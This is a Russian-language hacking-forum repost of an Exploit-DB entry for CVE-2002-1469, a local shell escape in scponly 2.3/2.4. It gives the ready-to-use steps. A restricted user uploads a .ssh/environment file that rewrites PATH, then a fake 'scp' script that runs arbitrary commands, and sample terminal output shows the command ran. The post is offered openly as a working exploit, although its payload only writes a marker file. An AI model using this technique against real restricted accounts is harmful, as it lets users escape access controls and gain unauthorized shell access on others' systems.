Exploit SCPOnly 2.3/2.4 - SSH Environment Shell Escaping

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21732
Проверка EDB
  1. Пройдено
Автор
DEREK D. MARTIN
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2002-1469
Дата публикации
2002-08-20
Код:
source: https://www.securityfocus.com/bid/5526/info

scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems.

The default installation of scponly does not place sufficient access controls on the .ssh subdirectory. Due to this
oversight, it is possible for a remote user to upload files which may allow command execution. This could lead to
unintended command execution, and regular shell access to a vulnerable host.

For example, the user could scp the following to
$HOME/.ssh/environment:

# ssh environment
PATH=/home/myhomedir/:/usr/bin:/bin
#end

Subsequently, the user could upload the following file to their home
directory, and call it scp:

#!/bin/sh

echo "I'm a bad boy" > /tmp/exploit
/usr/bin/scp $@

# end

When they next scp a file:

[root@restricted /tmp]
# ls -l
total 24
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit
[root@restricted /tmp]
# cat exploit
I'm a bad boy
 
Источник
www.exploit-db.com

Похожие темы